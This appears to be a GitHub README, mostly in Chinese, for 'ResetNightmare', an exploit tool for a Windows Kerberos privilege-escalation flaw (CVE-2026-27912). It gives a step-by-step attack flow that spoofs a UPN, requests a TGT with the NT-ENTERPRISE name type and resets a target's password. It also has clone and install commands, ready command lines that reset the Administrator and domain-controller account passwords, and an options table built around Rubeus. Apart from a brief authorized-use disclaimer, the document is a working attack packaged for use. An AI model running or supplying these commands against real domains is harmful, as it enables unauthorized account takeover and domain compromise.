CVE-2026-27912 - Windows Kerberos 权限提升漏洞
ResetNightmare - 通过 Kerberos 更改密码协议缺陷实现未授权密码重置
| 字段 | 值 |
|---|---|
| CVE | CVE-2026-27912 |
| 标题 | Windows Kerberos 权限提升漏洞 |
| CVSS | 8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| CWE | CWE-285:授权不当 |
| 发布日期 | 2026年4月14日 |
| 已修补 | 2026年4月 |
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success
Install-WindowsFeature RSAT-AD-PowerShell)# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912
# Install dependencies
pip install -r requirements.txt
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v
仅供授权的安全测试和教育研究使用。
未经授权访问计算机系统属于违法行为。作者不对本软件的滥用承担任何责任。
n0vax1337 / 安全研究员
MIT 许可证 - 请参阅 LICENSE
最后更新: 2026
| 参数 | 描述 | 默认值 |
|---|
-t / --target | 目标账户名称 | 必填 |
-p / --new-password | 目标账户的新密码 | 必填 |
-u / --upn-user | 用于设置伪造 UPN 的账户 | 必填 |
-up / --upn-password | UPN 账户的密码 | 必填 |
-c / --computer | UPNUser 是计算机账户 | 标志 |
-r / --rubeus-path | Rubeus.exe 的路径 | Rubeus.exe |
-e / --encryption | 支持的加密类型 | AES256 |
-path / --create-path | 创建新账户的 OU 路径 | "" |
-d / --dc | 域控制器名称 | 自动检测 |
-v / --verbose | 详细输出 | 标志 |